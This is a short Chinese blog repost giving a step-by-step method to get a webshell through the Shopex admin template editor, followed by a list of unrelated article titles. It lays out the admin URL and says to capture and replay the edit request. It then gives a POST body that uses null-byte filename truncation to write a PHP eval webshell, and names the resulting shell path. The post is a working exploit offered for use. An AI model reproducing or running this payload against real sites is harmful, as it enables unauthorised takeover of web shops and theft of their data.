Shopex 后台getshell
来源:互联网 发布:亿赛通数据泄露防护 编辑:程序博客网 时间:2024/04/29 09:58
应为SHOPEX把GPC转义回来了
在模板编辑那里 可以直接截断文件名,
代码就不贴了。利用方法
打开
./shopadmin/index.php#ctl=system/template&act=editor&p[0]=black&p[1]=index.html
随便点一个编辑
利用火狐插件
LIVE HTTP HEADER 抓包
点击replay
将post的内容改为
theme=purple&file=index(2).php%00.html&type=index(2)&file_name=&isbak=1&__=1&content=<?php eval($_POST[c])?>
点击repaly提交
然后./themes/purple/index(2).php 便是shell
- Shopex 后台getshell
- shopex前台getshell漏洞!
- shopex前台普通用户getshell最新漏洞
- ECSHOP后台getshell漏洞
- Discuz!X2.5最新版后台管理员权限Getshell及修复
- 基于ThinkPHP的2个CMS后台GetShell利用
- Shopex后台管理员用户名密码忘记了怎么办?shopex重置密码? 深圳外贸,深圳电子商务
- shopex后台商品分类数据库无法删除解决方案
- shopex 4.85 后台发货按钮不能解决的办法
- 如何去掉Shopex前台与后台的版权标识
- shopex 4.8.5 SQLINJECTION注射以及后台拿SHELL
- SHOPEX 4.8.5 注入漏洞以及后台拿SHELL
- shopex后台的安装及模板的安装
- shopex虚拟分类后台不更新前台能更新问题
- discuz x1.5 discuz 7.2 后台getshell 0day通杀版出来
- 刚登陆后台 屏蔽 由于您当前使用的网店证书不适用于shopex体系。。。。
- shopex模板
- 重装shopex
- 一些感悟
- 几个有关图的算法2(DFS,TopoLogicalSort) .
- gridview分页
- 短途自驾游山西全179
- Web Driver处理模态窗口无法获得句柄的问题
- Shopex 后台getshell
- Ubuntu 11.04 离线升级方法
- Android选择联结点
- 一个java crash的故障分析过程
- 消失的喀什老城 消失的大半新疆94
- java基本数据类型相互转换
- 黑马程序员学习日记-----------MSSQL日期函数
- 如画的水乡,如画的同里16
- 2012.07.09